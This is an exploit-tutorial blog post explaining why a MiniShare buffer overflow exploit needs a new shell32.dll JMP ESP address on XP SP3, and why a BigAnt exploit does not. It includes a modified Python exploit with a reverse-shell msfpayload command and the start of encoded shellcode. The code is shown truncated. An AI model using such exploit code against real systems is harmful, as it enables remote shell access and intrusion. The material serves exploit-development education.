Do the Exploit Tutorials Work Under XP SP3?

I have received a couple of questions from blog readers recently about whether the various exploits I have written in my various exploit tutorials will work under XP SP3, so I thought I would write a quick blog post on the subject here in case other readers were interested.

As mentioned in each of my tutorials, the platform I have been using for my victim machine is XP SP2.  There was no real reason behind this choice of attack platform, its just what I happened to have handy at the time.  I also liked that it uses the same patchlevel as the XP FDCC VHD images, so that people could download these and follow along.

This platform does also give us some interesting exploit protections to work around, such as the SafeSEH settings, and the heap overflow protections, which helps make the tutorials a little more interesting, and it also is a fairly common platform, so it helps make the tutorials relevant.

So whats the difference between XP SP2 and XP SP3 from an exploit perspective?  Well not that much.

There are no significant new exploit protection methods implemented in SP3, so there are no new twists we have to learn to exploit on SP3.  The main difference we will find, is in the structure of modules included with Windows.

In the first exploit tutorial, there were no third party modules included with Minisploit, so when we needed to find a module that included a JMP ESP instruction we ended up looking in a module that comes included with Windows - namely shell32.dll.  We did a search for a JMP ESP instruction in shell32.dll, and used the first one we found, at address 0x7CA58265.

What happens when we search for the first JMP ESP instruction on a machine with SP3 installed?  The first JMP ESP is found at a different address of 0x7C9D30D7.

In a SP3 system, the instruction located at 0x7CA58265 does not contain a JMP ESP at all, it has a completely different instruction.


Because of this difference in the location of the JMP ESP location between XP SP2 and XP SP3 our Minishare exploit will not work unmodified on SP3.  The process of writing the exploit is still valid for SP3 however, we just need to account for the new location of the JMP ESP instruction to make it work.

Something like the following should do it.  The line in bold shows the change between the original exploit and the modified-for-SP3 exploit.

import socket


buffer = "GET "
buffer+= "\x90" * 1787
buffer+= "\xD7\x30\x9D\x7C" # EIP Overwrite. Shell32.dll, XP SP3, JMP ESP, 7C9D30D7.
# msfpayload windows/shell_reverse_tcp LHOST= LPORT=443 R | msfencode -a x86 -b '\x00\x0a\x0d' -t c - x86/shikata_ga_nai 342 bytes
buffer+= "\x90" * 16
buffer+= ("\xdb\xdd\xd9\x74\x24\xf4\x2b\xc9\xb1\x4f\x58\xba\x2c\x98\x23"
buffer+= " HTTP/1.1\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

If you have ever used Metasploit and noticed the "target" option for certain exploits, which has to be set to the appropriate OS version for the exploit to work, you now have an idea of what is going on behind the scenes.  The target setting configures a particular offset within one of that systems modules to allow the exploit to run, and the offset will be different across the different system "targets" for the exploit.

What about the second exploit tutorial?  Well this exploit was able to use an overwrite location from a third party module - one included with the vulnerable program itself.  This means it is not susceptible to failure due to changes in the layout of modules included with Windows, because it doesnt need to access instructions in those modules via hard coded memory addresses.

You can see the BigAnt crash reproduced in SP3 below, and I have tested the exploit written in the second tutorial and can confirm it works completely without modification in XP SP3. 

You may have noticed that I mention the concept of a "Universal exploit" in a number of my tutorials, well this is what I mean by that.  The exploit only uses memory addresses that are included with modules that come with the vulnerable program itself, so regardless of the underlying platform the memory addresses that the exploit reiles on should be the same as long as the version of the vulnerable program is the same.  Now this doesnt always strictly work out in practice, major changes in the host OS can change the behaviour of the client application enough so that the exploit breaks in other ways.  SP2 and SP3 are similar enough however that exploits that dont require the use of hard coded instructions from Windows modules will usually work on both.

I hope this clears up some of the confusion around this issue.  Feel free to ask questions in the comments if any issue needs clarification...